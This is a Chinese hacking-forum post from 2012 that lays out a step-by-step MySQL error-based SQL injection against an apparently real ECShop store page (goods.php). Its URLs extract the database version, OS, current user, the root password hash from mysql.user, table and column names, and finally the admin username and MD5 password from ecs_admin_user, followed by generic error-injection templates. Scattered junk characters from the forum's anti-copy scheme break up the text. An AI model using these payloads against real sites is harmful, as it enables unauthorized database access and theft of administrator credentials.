找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1976|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 9 |2 o3 D, u" G. O
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23% p1 e/ U2 }( J# K1 J$ y# w
+ y4 d0 j5 T+ R3 ]. g" g& O
判断系统
: R( z, P/ O. |; R
( f3 _2 {! q5 g4 B8 y! ]6 {: @6 yhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%239 t4 G( c. N9 _3 M

. }' L) i4 G2 K7 B! Q! r6 }7 v, \# t0 d  n

8 S1 M7 x( n8 t0 y6 K  L3 y  ?6 d当前 user()
9 X- v; m' D( h( w9 ?+ J4 o0 V( Y4 ?, ?4 L# x3 |
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* m1 L: U2 p1 X! C) a

) w0 w9 m/ R/ Y' m6 Q+ j. z! n! D  I; |
9 C! r# s2 F; A/ E" V
当前 database()7 F; X7 |. q+ P9 J
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 b( l" `' J7 e1 l  C4 D0 x+ W3 ?

/ F5 ~1 W+ [. k. g
+ I3 t% Z7 v! n9 N5 V2 Z
  ]! z. R9 L9 w5 g* }: m& j9 `! V. [
root hash
+ i& N6 v' V4 a+ m6 X, w3 E6 l" M
$ Y  ]4 G3 _6 J* ehttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23; ?  v- D- s( b4 U+ }* O, N/ M

; c4 f  ?9 i/ t$ K$ o  r' |, m& m' d4 {
. K# e- ~% t" k8 Z5 _. x
当前 数据库表名9 W- x7 u2 i0 S2 e" n8 ?
. D) g' K. G- a% z3 q; }
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
7 X1 z% V' x8 e5 i4 i
/ @4 [3 }% I+ W: z+ O- L! U% S+ S( ~( n* ~  g# i/ I( L) O
0 ?. ~7 }8 D1 N% ]5 E. b
当前 数据库 user_name 字段
$ `3 d1 k' B( G' @/ V1 q- D1 t; A; x* u+ R$ ~  c+ K
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
# M3 O5 D" F& n# V9 @" m( C3 l- |
当前 数据库 字段 password
) N) A* K3 I" X0 H9 H9 fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
9 m6 k( c6 D8 X* l
8 W1 W6 Q4 G+ Z) H* y( E2 g# ]2 V- G' ]% [7 W7 X" N/ u. T
' Q. x" x# O1 V$ g, B
获得 admin passwd(md5)" ?, `7 r- |6 N4 E3 h
3 H. Z5 C' G4 a6 t( `1 q- s* V0 d3 w

9 O: p. l& y' p0 o8 t. Dhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& [) n, @& `: W6 t  F. X
& ]& X1 O& z0 N  t- g& J
报错注射
  }7 ^; B. B( o4 r' N0 ESELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
7 _, Q# W1 w; ]7 a: A
8 r; d6 ]& J! F6 i2 tSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)- l0 `) M! C7 X3 J0 B% f
0 \) ^, X- ^' i0 x
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表